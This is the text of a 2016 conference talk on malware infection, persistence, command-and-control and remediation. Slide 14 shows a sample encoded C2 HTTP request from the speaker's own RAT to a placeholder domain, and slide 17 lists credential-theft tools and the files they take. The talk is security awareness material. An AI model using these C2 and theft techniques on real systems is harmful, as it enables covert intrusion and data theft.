This is the presentation I gave during the e-Crime conference, February 2016.

1. A few bits about Malware
A story about trojan horses and rats.

2. $ whoami
• Michael Hendrickx
• Senior Security Analyst @ HelpAG
• Vulnerability Assessments
• Social Engineering
• Presentations 
• Created new undetected* RAT for the company
• Belgian
* Until now 

3. Malware attacks: a real threat
• Malware have caused
a lot of damage
• Many names: RAT’s, virus, Trojan,
rootkit, ransomware, …
• Examples: Cryptolocker, Zeus,
BlackEnergy, …
• Targets different
platforms:
• Browsers
• Smartphones
• PC’s

4. Malware attacks: stages
• Malware attacks comes in 2 stages
Infection
Exploited bugs, phishing,
waterhole attacks, USB,
unattended terminal, …
Persistence
AV evasion, persistence,
looting, CNC connectivity,
lateral movement
“you’re in trouble”

5. Malware attacks: infection
• Stage 1: modes of Infection
Exploited
Software
Bugs
(Spear)
phishing
Waterhole
attack
Malicious
USB

6. Malware attacks: infection
• Exploited software bugs
• Attacker hacks into vulnerable service
• Could be anything:
• SQL injection on website leads to code execution
• Poorly implemented upload functionality
• Unpatched server software
• Man in the Middle
• Weak passwords
• …

7. Malware attacks: infection
• Spear phishing
• Very specific message to single or very few victims
• Holds malicious payload
• Macro, PDF, renamed files,
trojaned archives, …
• Or, links to malicious file:
• Needs to be downloaded, won’t
get caught by your AV.

8. Malware attacks: infection
• Waterhole attack
• Indirect targeted attack
• Attacker compromises sites that the victim probably visits.
• Exploits outdated browser or plugins
• Forces install of malware
“your flash player is outdated”
“you should update Java”

9. Malware attacks: infection
• Evil USB dongle
• USB peripheral can be anything
• USB hard drive / dongle
• Keyboard, WIFI / network adapter,
Microphone, …
• Hub with any of the above
• Example: USB rubber ducky
• Looks like dongle, is a keyboard
• Types 1000 words per minute
• Is only 30 USD

10. Malware attacks: stages
• On to stage 2:
Infection
Exploited bugs, phishing,
waterhole attacks, USB,
unattended terminal, …
Persistence
AV evasion, persistence,
looting, CNC connectivity,
lateral movement

11. Malware attacks: persistence
• Stage 2: Persistence
• Execution persistence
• Ensure that our malware keeps on running
• CnC Connectivity
• Listen for commands
• AV Evasion / Hiding
• To prevent malware from being detected, removed
• Lateral movement
• Infect more machines

12. Malware attacks: Execution persistence
• Ensure malware keeps on running
• Startup folder
• Registry keys
• Automatic Services
• Browser plugins / helper objects
• You’re re-infected whenever the browser is
opened
• Infected document templates
• Every time a word/ppt/excel file is opened or created, you’re re-infected.
Use Microsoft’s Autoruns to see what processes start upon startup.
(https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)

13. Malware attacks: CnC connectivity
• Direct traffic
• Probably (hopefully) detected and blocked
• HTTP Tunnel
• May get detected by L7 firewalls
• “deep packet inspection”, pretty shallow
• HTTPS
• Difficult to see what’s happening, unless MITM.
• DNS Tunneling
• Usually gets “proxied” to target DNS server
• Do you monitor anomalies?
• Peer to peer WIFI network
Hi, I’m an ad-hoc wifi
network
Up to 10 – 20 meters

14. Malware attacks: hagrat CnC
• Encode / Encrypt / Obfuscate traffic
POST /css/cc.aspx HTTP/1.1
Accept: text/html;q=0.8,application/xml,*/*
Accept-Language: en-gb;q=0.8,en
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: www.thisisafakedomain.com
Content-Length: 277
Connection: Keep-Alive
__VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWN
yb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdW
Q+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;.
1:Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:UsershendrickxownCloud>dir c:/
Invalid switch - "".
C:UsershendrickxownCloud>

15. Malware attacks: hiding
• Hiding
• Download multiple stages
Dropper
Malicious
Payload
(Real Virus)

16. Malware attacks: hiding
• Multi stage download ensures correct victim
Malicious
Payload
(Real Virus)Can I reach the Internet?
Dropper
Innocent
Payload
This is not the IP /
Company / country
I’m targeting
Cool, I’ll
install it
Bingo!

17. Malware attacks: lateral movement
• Exfiltration of information
• Documents (%userprofile%documents)
• Passwords (mimikatz, Lazagne)
• Browser history
• Emails, files, …
• Recon / Infect the network
• Ping other machines
• File shares
• (Sharepoint) portals

18. Remediation
• Human factor: don’t get infected
• Social Engineering exercises
• Awareness
• Alerting IT security (“Support, I think I did
something wrong”)
• Technical factor: prevent,
detect, destroy
• Tight controls on end points
• Monitor inbound programs (attachments, downloads, …)
• Monitor network usage
• DNS Anomalies, unidentified protocols, …
• Regular scanning with AV, IOC detectors, …
• Such as Loki: (https://github.com/Neo23x0/Loki)

19. Thank you!
Questions?
Don’t accept any USB dongles from me! 

20. CONTACT US | WWW.HELPAG.COM | INFO@HELPAG.COM
DUBAI, UAE
ARJAAN OFFICE TOWER,
OFFICE 1201 / 1208, PO BOX 500741
T +971 4 440 5666
F +971 4 363 6742
ABU DHABI, UAE
SALAM HQ BLDG,
BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195
T +971 2 644 3398
F +971 2 639 1155
DOHA, QATAR
AL DAFNA – PALM TOWER
OFFICE 4803, WEST BAY, P.O. BOX 31316
T +974 4432 8067
F +974 4432 8069